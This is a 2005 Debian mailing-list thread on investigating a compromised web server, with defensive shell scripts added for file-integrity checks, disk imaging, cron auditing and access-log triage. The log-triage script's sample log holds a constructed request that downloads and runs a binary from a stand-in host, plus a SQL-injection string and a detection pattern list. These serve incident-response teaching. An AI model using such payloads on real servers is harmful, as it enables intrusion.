Re: a compromised machine

2005-07-26 Thread Davide Prina
Nejc Novak wrote: So, for now I killed this process, disabled the cronjob and killed the web server - there is no way the attacker is capable of coming back into the server, or is there a chance that there is another backdoor installed somewhere (chkrootkit doesn't find anything). try also rk

RE: a compromised machine

2005-07-26 Thread Simon Allard
Kernel rootkits are very good at hiding themselves when they are running. The best way is to mount the hard drive in another box as /mnt or something and run chkrootkit over it, and also md5sum known hacked binaries like ls etc. > OK :) > > So, for now I killed this process, disabled the cronjob an
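
A worked version of the offline check Simon describes, added here as an example and not part of his message: on a Debian system dpkg keeps the install-time MD5 of every packaged file in /var/lib/dpkg/info/<package>.md5sums, so once the suspect disk is mounted read-only on a clean machine the whole set of binaries can be compared against those lists instead of hand-picking ls and friends. The demo root the script builds (package names, file contents, the "trojaned" ps and the deleted netstat) is constructed for illustration only. Two caveats: the md5sums lists live on the same disk, so an attacker who had root could have rewritten them, and not every package ships one; for a binary you really care about, take the reference hash from a freshly downloaded copy of the .deb instead.

```sh
#!/bin/sh
# Added example (not from the thread): check the binaries on an offline-mounted
# root filesystem against the md5sums dpkg recorded at install time, which live
# in /var/lib/dpkg/info/<package>.md5sums on any Debian system.
# Intended use, from a clean box with the suspect disk attached:
#   mount -o ro,noexec,nodev /dev/sdb1 /mnt && verify_dpkg_md5sums /mnt
# The same command on the live, compromised kernel proves nothing: a kernel
# rootkit can feed md5sum the original bytes while executing the trojan.

# Print "MODIFIED pkg: /path" or "MISSING pkg: /path" for every packaged file
# that no longer matches. Exit status 0 = all clean, 1 = something flagged.
verify_dpkg_md5sums() {
    root=${1%/}                       # "/mnt/" and "/mnt" both work; "/" becomes ""
    bad=0
    for list in "$root"/var/lib/dpkg/info/*.md5sums; do
        [ -f "$list" ] || continue    # unexpanded glob when no lists exist
        pkg=$(basename "$list" .md5sums)
        # each line is "<md5>  <path relative to />"
        while read -r expected path; do
            [ -n "$path" ] || continue
            f="$root/$path"
            if [ ! -f "$f" ]; then
                echo "MISSING  $pkg: /$path"
                bad=$((bad + 1))
                continue
            fi
            actual=$(md5sum "$f" | cut -d' ' -f1)
            if [ "$actual" != "$expected" ]; then
                echo "MODIFIED $pkg: /$path"
                bad=$((bad + 1))
            fi
        done < "$list"
    done
    [ "$bad" -eq 0 ]
}

# Constructed stand-in for a mounted root (NOT a real image): three packaged
# binaries; after dpkg "recorded" their hashes, ps is overwritten and netstat
# is deleted, which is what a user-space rootkit install looks like on disk.
make_demo_root() {
    root=$1
    mkdir -p "$root/bin" "$root/var/lib/dpkg/info"
    printf 'genuine ls\n'      > "$root/bin/ls"
    printf 'genuine ps\n'      > "$root/bin/ps"
    printf 'genuine netstat\n' > "$root/bin/netstat"
    for pair in "coreutils bin/ls" "procps bin/ps" "net-tools bin/netstat"; do
        set -- $pair                  # $1 = package, $2 = relative path
        printf '%s  %s\n' "$(md5sum "$root/$2" | cut -d' ' -f1)" "$2" \
            > "$root/var/lib/dpkg/info/$1.md5sums"
    done
    printf 'trojaned ps\n' > "$root/bin/ps"
    rm -f "$root/bin/netstat"
}

# Stand-alone demo on the constructed root.
demo=$(mktemp -d)
make_demo_root "$demo"
verify_dpkg_md5sums "$demo" || echo "integrity problems found under $demo"
rm -rf "$demo"
```

The debsums package does the same comparison on a live system, with the same limitation: both the running kernel and the on-disk lists have to be trusted for the result to mean anything, which is exactly what is in doubt here.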

Re: a compromised machine

2005-07-26 Thread Nejc Novak
OK :) So, for now I killed this process, disabled the cronjob and killed the web server - there is no way the attacker is capable of coming back into the server, or is there a chance that there is another backdoor installed somewhere (chkrootkit doesn't find anything). Nejc Marcin Owsiany wrote:

Re: a compromised machine

2005-07-26 Thread Nejc Novak
Can you also define what it does? Or what was the attacker capable of doing with it? Thanks.. Edward Faulkner wrote: On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote: It's attempting to connect to two different hosts: Never mind that second address... that's my DNS.

Re: a compromised machine

2005-07-26 Thread Marcin Owsiany
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote: > On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote: > > Can you get any information out of this cron file? I tried creating the > > same exec that this file creates, but obviously I was doing something wrong :) > > The crontab wri

Re: a compromised machine

2005-07-26 Thread Edward Faulkner
On Tue, Jul 26, 2005 at 04:39:20PM -0400, Edward Faulkner wrote: > It's attempting to connect to two different hosts: Never mind that second address... that's my DNS...

Re: a compromised machine

2005-07-26 Thread Edward Faulkner
On Tue, Jul 26, 2005 at 10:02:52PM +0200, Nejc Novak wrote: > Can you get any information out of this cron file? I tried creating the > same exec that this file creates, but obviously I was doing something wrong :) The crontab writes out a binary file and executes it. I straced the binary on a virtual m

Re: a compromised machine

2005-07-26 Thread Nejc Novak
Hi again! I found out how the process is started. There was a file created - /var/spool/cron/crontabs/www-data. I hope that it's OK if I post it here as an attachment. The creation of the file was 21.7.2005 23:55. I checked apache logs for that time but there was nothing weird to notice. Can you get

RE: a compromised machine

2005-07-25 Thread Mathieu JANIN
On the 12989th day after Epoch, Nejc Novak wrote: > I checked crontabs and I haven't found anything. But new processes started > > www-data 6705 0.0 0.1 1616 600 ? S 21:31 0:00 > /tmp/dlciiqlno x > www-data 6762 0.0 0.0 0 0 ?

Re: a compromised machine

2005-07-24 Thread François TOURDE
On the 12989th day after Epoch, Nejc Novak wrote: > I checked crontabs and I haven't found anything. But new processes started > > www-data 6705 0.0 0.1 1616 600 ? S 21:31 0:00 > /tmp/dlciiqlno x > www-data 6762 0.0 0.0 0 0 ? Z 22:10 0:00 [sh] > > www-dat

Re: a compromised machine

2005-07-24 Thread Bernd Eckenfels
In article <[EMAIL PROTECTED]> you wrote: > I still haven't managed to find out how exactly this happened. And > probably a reinstall will be needed? What do you think? Yes, a reinstall on compromised hosts is always needed; however, you should make an image of the system for forensics, you don't want t
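
The imaging step Bernd recommends, as an added example that is not part of his message: take a raw copy of the disk before anything is reinstalled, and hash both the source and the copy so the image can later be shown to match what was on the machine. The "disk" the script images is a constructed 4 KiB file; in real use SRC is the block device as seen from a rescue CD or from a clean box the disk was moved to, and DEST sits on other storage.

```sh
#!/bin/sh
# Added example (not from the thread): image the suspect disk before
# reinstalling, and record hashes so the copy can be shown to be faithful.
# In real use SRC is the block device (e.g. /dev/sda) seen from a rescue CD
# or a clean machine the disk was moved to; DEST is a file on other storage.

# Raw sector-by-sector copy of SRC to DEST; hash of the image is written to
# DEST.sha256 and printed.
#   bs=512 matches the sector size, so conv=sync never pads a whole disk;
#   conv=noerror keeps reading past bad sectors instead of aborting, and sync
#   zero-fills those sectors so every later offset still lines up with the disk.
# dd's own summary (records in/out, error count) stays on stderr on purpose.
image_disk() {
    src=$1
    dest=$2
    dd if="$src" of="$dest" bs=512 conv=noerror,sync
    sha256sum "$dest" > "$dest.sha256"
    cut -d' ' -f1 "$dest.sha256"
}

# Exit 0 if the image hashes identically to the source it was taken from.
# Only meaningful while the source is quiescent (unmounted, or mounted ro).
verify_image() {
    [ "$(sha256sum "$1" | cut -d' ' -f1)" = "$(sha256sum "$2" | cut -d' ' -f1)" ]
}

# Constructed stand-in for a disk (NOT a real device): 8 random sectors.
make_demo_disk() {
    dd if=/dev/urandom of="$1" bs=512 count=8 2>/dev/null
}

# Stand-alone demo.
disk=$(mktemp)
img=$(mktemp)
make_demo_disk "$disk"
echo "image sha256: $(image_disk "$disk" "$img")"
verify_image "$disk" "$img" && echo "image matches source"
rm -f "$disk" "$img" "$img.sha256"
```

The image is what gets analysed afterwards: mount -o ro,noexec,loop image.dd /mnt for a partition image (add offset= for a partition inside a whole-disk image), and work on the mount; the original disk goes in a drawer.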

Re: a compromised machine

2005-07-24 Thread JM
Reinstalling seems the only option left... with the added security features discussed previously, monitoring the server closely after the new installation. I would do the new installation on a new hard disk, saving and afterwards installing the seemingly compromised hard disk for a forensic analysis in a mac

Re: a compromised machine

2005-07-24 Thread Nejc Novak
I checked crontabs and I haven't found anything. But new processes started www-data 6705 0.0 0.1 1616 600 ? S 21:31 0:00 /tmp/dlciiqlno x www-data 6762 0.0 0.0 0 0 ? Z 22:10 0:00 [sh] www-data 6770 0.0 0.1 1624 608 ? S 22:10 0:00 [bdflu

Re: a compromised machine

2005-07-24 Thread Ulf Harnhammar
On Sun, Jul 24, 2005 at 07:40:21PM +0200, Nejc Novak wrote: > That means that the process was started at 17:31 today. So I checked > I killed the process and webserver and at 19:31 the process again > started with the same lines in syslog. Check your crontabs (in various locations) and atq. It
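
A script for the "crontabs in various locations and atq" check Ulf suggests, added here as an example rather than part of his message. It walks every place Debian schedules jobs from (/etc/crontab, /etc/cron.d, the per-user spool /var/spool/cron/crontabs where the www-data file later turned up, the run-parts directories and the at spool /var/spool/cron/atjobs) and then flags entries that run, fetch or chmod something under /tmp, /var/tmp or /dev/shm. The demo tree it builds is constructed; in particular the www-data entry's command is made up and is not the contents of the crontab from the thread.

```sh
#!/bin/sh
# Added example (not from the thread): list every scheduled job on a Debian
# system and flag the ones that run something out of a world-writable directory.
# ROOT is / for the live host, or the mount point of the suspect disk (better:
# a kernel rootkit on the live host can hide files from this listing too).
# atq only shows the calling user's jobs unless run as root; the spool
# directory is the ground truth, so it is read directly here.

# Print "path<TAB>line" for each non-blank, non-comment line of file $2,
# with the mount prefix $1 stripped from the path.
dump_file() {
    grep -Ev '^[[:space:]]*(#|$)' "$2" | while IFS= read -r line; do
        printf '%s\t%s\n' "${2#$1}" "$line"
    done
}

list_scheduled_jobs() {
    root=${1%/}
    for f in "$root/etc/crontab" "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/crontabs/* \
             "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
             "$root"/etc/cron.weekly/* "$root"/etc/cron.monthly/* \
             "$root"/var/spool/cron/atjobs/*; do
        [ -f "$f" ] || continue       # skips unexpanded globs
        dump_file "$root" "$f"
    done
}

# Jobs that execute, fetch or mark executable something under /tmp,
# /var/tmp or /dev/shm: the usual www-data persistence pattern.
flag_world_writable_jobs() {
    list_scheduled_jobs "$1" | grep -E '/tmp/|/var/tmp/|/dev/shm/|wget |curl |chmod \+x' || true
}

# Constructed demo tree (NOT a real system): ordinary Debian entries plus a
# www-data crontab modelled on the one in the thread. Its command is made up.
make_demo_root() {
    root=$1
    mkdir -p "$root/etc/cron.d" "$root/etc/cron.daily" \
             "$root/var/spool/cron/crontabs" "$root/var/spool/cron/atjobs"
    printf 'SHELL=/bin/sh\n# m h dom mon dow user command\n17 * * * * root cd / && run-parts --report /etc/cron.hourly\n' \
        > "$root/etc/crontab"
    printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$root/etc/cron.daily/logrotate"
    printf '0 3 * * * /usr/local/bin/backup.sh\n' > "$root/var/spool/cron/crontabs/root"
    printf '# constructed attacker entry\n*/10 * * * * /tmp/.x >/dev/null 2>&1\n' \
        > "$root/var/spool/cron/crontabs/www-data"
}

# Stand-alone demo.
demo=$(mktemp -d)
make_demo_root "$demo"
echo "--- all scheduled jobs"
list_scheduled_jobs "$demo"
echo "--- jobs touching world-writable dirs"
flag_world_writable_jobs "$demo"
rm -rf "$demo"
```

Run it with the suspect disk mounted rather than with / : if the cron daemon itself or a library it loads has been replaced, the live listing is whatever the attacker wants it to be. Once a file such as crontabs/www-data is found, stat it for its change time before touching it; that timestamp is what to line up against the web logs.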

Re: a compromised machine

2005-07-24 Thread Nejc Novak
Thanks for your help. I didn't make much progress though. However, after killing all these processes, a new one was run: www-data 6059 0.0 0.1 1616 600 ? S 17:31 0:00 /tmp/dlciiqlno x. That means that the process was started at 17:31 today. So I checked logs (all virtual serv

Re: a compromised machine

2005-07-24 Thread Steve Kemp
On Sun, Jul 24, 2005 at 01:19:25PM +0200, Christoph Haas wrote: > Since the process runs as "www-data" some kiddy has abused a web service > on your server to download and run an external software. Look for > suspicious log lines of your web server. Yes .. > Examples of hacks on our servers: >

Re: a compromised machine

2005-07-24 Thread Geoff Crompton
Christoph Haas wrote: > On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote: > It should be rather easy finding signs of weird accesses like %20 or > chr(). Also look for weird signs in /tmp. > > If your server is important you should consider reinstalling. I'd urge you to spend the time
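
For the log-grepping Christoph suggests (quoted by Geoff above), here is an added example that is not part of either message: a small pattern list applied to an Apache access log, and a second filter that pulls out every request around a given minute so the window in which a file like crontabs/www-data appeared can be read line by line. The sample log is constructed (RFC 5737 documentation addresses, a made-up CGI path); the second line shows the shape of a "download and run from /tmp" request, not anything recovered from the server in the thread.

```sh
#!/bin/sh
# Added example (not from the thread): pull candidate attack requests out of an
# Apache access log. The thread's advice is to look for things like "%20" and
# "chr(" in requests; this extends that to a short list of signs that a web
# script was used to download and run something. It is a triage filter for a
# human to read, not an alert: "%20" alone matches plenty of legitimate URLs.

# Extended regex, matched case-insensitively against whole log lines.
SUSPICIOUS='%20|chr\(|wget |curl |/tmp/|/dev/shm/|\.\./|%2e%2e|cmd=|passthru|shell_exec|system\(|base64_decode|%00'

# Print every line of the given log file(s) that matches SUSPICIOUS.
suspicious_requests() {
    grep -Ei "$SUSPICIOUS" "$@" || true
}

# Print every request whose timestamp starts with $2, e.g. '21/Jul/2005:23:5'
# for the ten minutes around the time the crontab file appeared.
requests_at() {
    grep -F "[$2" "$1" || true
}

# Constructed sample log in Apache combined format (NOT from the thread's
# server; hosts are RFC 5737 documentation addresses, the CGI path is made up).
write_demo_log() {
    cat > "$1" <<'EOF'
192.0.2.10 - - [21/Jul/2005:23:54:58 +0200] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.0.2.10 - - [21/Jul/2005:23:55:01 +0200] "GET /cgi-bin/script.cgi?cmd=cd%20/tmp;wget%20http://198.51.100.7/x;chmod%20+x%20x;./x HTTP/1.1" 200 0 "-" "Mozilla/4.0"
203.0.113.5 - - [22/Jul/2005:00:02:11 +0200] "GET /images/logo.png HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Jul/2005:00:02:30 +0200] "GET /page.php?id=1%27%20union%20select%20chr(97) HTTP/1.1" 500 211 "-" "-"
EOF
}

# Stand-alone demo.
log=$(mktemp)
write_demo_log "$log"
echo "--- suspicious requests"
suspicious_requests "$log"
echo "--- requests around 21/Jul/2005 23:5x"
requests_at "$log" '21/Jul/2005:23:5'
rm -f "$log"
```

Two things to keep in mind when reading the output: POST bodies are not in the access log at all, so a payload delivered that way shows up only as an innocent-looking POST line with an odd size or status, and the attacker's request may have hit a different virtual host's log than the one being searched, so run the filter over every access log, including rotated ones, for the window in question.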

Re: a compromised machine

2005-07-24 Thread Christoph Haas
On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote: > I think one of my servers has been compromised. Since I don't have a lot > of experience with these things, I beg you for your help. > > The information I have gathered together till now is the following. The server > is running latest debia

a compromised machine

2005-07-24 Thread Nejc Novak
Hi! I think one of my servers has been compromised. Since I don't have a lot of experience with these things, I beg you for your help. The information I have gathered together till now is the following. The server is running latest Debian stable, sarge. There was heavy traffic on the server and ps